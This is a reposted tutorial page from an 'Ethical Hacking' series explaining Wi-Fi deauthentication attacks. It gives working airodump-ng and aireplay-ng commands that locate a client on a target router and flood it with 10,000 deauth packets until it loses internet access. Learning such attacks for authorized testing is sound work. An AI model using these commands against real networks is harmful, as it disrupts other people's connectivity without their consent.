码迷,mamicode.com
首页 > Web开发 > 详细

Ethical Hacking - NETWORK PENETRATION TESTING(5)

时间:2019-11-09 19:44:15      阅读:80      评论:0      收藏:0      [点我收藏+]

标签:pack   any   nbsp   intern   elf   cti   targe   ice   pac   

Deauthentication Attacks Theory

This attack is used to disconnect any device from any network within our range even if the network is protected with a key.

  • Hacker sends de-authentication packets to the router pretending to be the target matching(by spoofing its MAC address.)
  • At the same time, the hacker sends packets to the target machine (pretending to be the router) telling it that is needs to re-authenticate itself.

Start sniff the target router to find the victim machine.

airodump-ng --channel 9 --bssid B0:7F:B9:A4:42:EC wlan0

技术图片

Start the replay attack.

aireplay-ng --deauth 10000 -a B0:7F:B9:A4:42:EC -c A8:66:7F:34:99:B5 wlan0

技术图片

 

 The victim machine can not browse the Internet now...

Ethical Hacking - NETWORK PENETRATION TESTING(5)

标签:pack   any   nbsp   intern   elf   cti   targe   ice   pac   

原文地址:https://www.cnblogs.com/keepmoving1113/p/11827209.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!